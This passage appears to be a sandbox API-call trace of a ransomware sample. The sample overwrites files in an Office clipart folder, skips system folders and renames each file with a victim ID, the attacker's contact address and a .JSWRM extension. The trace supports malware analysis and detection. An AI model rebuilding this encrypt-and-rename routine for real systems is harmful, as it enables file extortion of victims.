RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099145.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.556] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24759) returned 1 [0079.556] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60b0) returned 0x24d210 [0079.557] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x60b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x60b0, lpOverlapped=0x0) returned 1 [0079.561] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.561] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x60b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x60b0, lpOverlapped=0x0) returned 1 [0079.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.561] CloseHandle (hObject=0x314) returned 1 [0079.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0079.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0079.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0079.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0079.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0079.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.561] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099145.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099145.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099145.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0079.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.562] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40d4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099146.WMF", cAlternateFileName="")) returned 1 [0079.562] lstrcmpiW (lpString1="J0099146.WMF", lpString2=".") returned 1 [0079.562] lstrcmpiW (lpString1="J0099146.WMF", lpString2="..") returned 1 [0079.562] lstrcmpiW (lpString1="J0099146.WMF", lpString2="...") returned 1 [0079.563] lstrcmpiW (lpString1="J0099146.WMF", lpString2="windows") returned -1 [0079.563] lstrcmpiW (lpString1="J0099146.WMF", lpString2="recovery") returned -1 [0079.563] lstrcmpiW (lpString1="J0099146.WMF", lpString2="perflogs") returned -1 [0079.563] lstrcmpiW (lpString1="J0099146.WMF", lpString2="documents and settings") returned 1 [0079.563] lstrcmpiW (lpString1="J0099146.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.563] lstrcmpiW (lpString1="J0099146.WMF", lpString2="system volume information") returned -1 [0079.563] lstrcmpiW (lpString1="J0099146.WMF", lpString2="msocache") returned -1 [0079.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099146.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099146.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099146.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0079.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099146.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099146.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099146.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0079.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0079.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0079.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.563] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16596) returned 1 [0079.563] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40d0) returned 0x24d210 [0079.564] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x40d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x40d0, lpOverlapped=0x0) returned 1 [0079.566] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.566] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x40d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x40d0, lpOverlapped=0x0) returned 1 [0079.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.566] CloseHandle (hObject=0x314) returned 1 [0079.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0079.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0079.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0079.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0079.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0079.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.567] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099146.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099146.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099146.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.567] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f39, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099147.JPG", cAlternateFileName="")) returned 1 [0079.567] lstrcmpiW (lpString1="J0099147.JPG", lpString2=".") returned 1 [0079.567] lstrcmpiW (lpString1="J0099147.JPG", lpString2="..") returned 1 [0079.567] lstrcmpiW (lpString1="J0099147.JPG", lpString2="...") returned 1 [0079.567] lstrcmpiW (lpString1="J0099147.JPG", lpString2="windows") returned -1 [0079.567] lstrcmpiW (lpString1="J0099147.JPG", lpString2="recovery") returned -1 [0079.567] lstrcmpiW (lpString1="J0099147.JPG", lpString2="perflogs") returned -1 [0079.567] lstrcmpiW (lpString1="J0099147.JPG", lpString2="documents and settings") returned 1 [0079.567] lstrcmpiW (lpString1="J0099147.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.568] lstrcmpiW (lpString1="J0099147.JPG", lpString2="system volume information") returned -1 [0079.568] lstrcmpiW (lpString1="J0099147.JPG", lpString2="msocache") returned -1 [0079.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0079.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099147.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099147.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099147.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0079.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0079.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099147.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099147.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099147.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0079.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0079.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099147.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.591] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24377) returned 1 [0079.591] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f30) returned 0x24d210 [0079.592] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5f30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5f30, lpOverlapped=0x0) returned 1 [0079.596] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.596] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5f30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5f30, lpOverlapped=0x0) returned 1 [0079.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.596] CloseHandle (hObject=0x314) returned 1 [0079.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0079.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0079.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0079.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0079.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0079.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.597] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099147.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099147.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099147.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0079.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.598] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4752, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099148.JPG", cAlternateFileName="")) returned 1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2=".") returned 1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2="..") returned 1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2="...") returned 1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2="windows") returned -1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2="recovery") returned -1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2="perflogs") returned -1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2="documents and settings") returned 1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2="system volume information") returned -1 [0079.598] lstrcmpiW (lpString1="J0099148.JPG", lpString2="msocache") returned -1 [0079.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099148.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099148.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099148.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0079.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099148.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099148.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099148.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0079.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0079.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099148.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.599] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18258) returned 1 [0079.599] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4750) returned 0x24d210 [0079.599] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4750, lpOverlapped=0x0) returned 1 [0079.602] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.602] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4750, lpOverlapped=0x0) returned 1 [0079.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.603] CloseHandle (hObject=0x314) returned 1 [0079.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 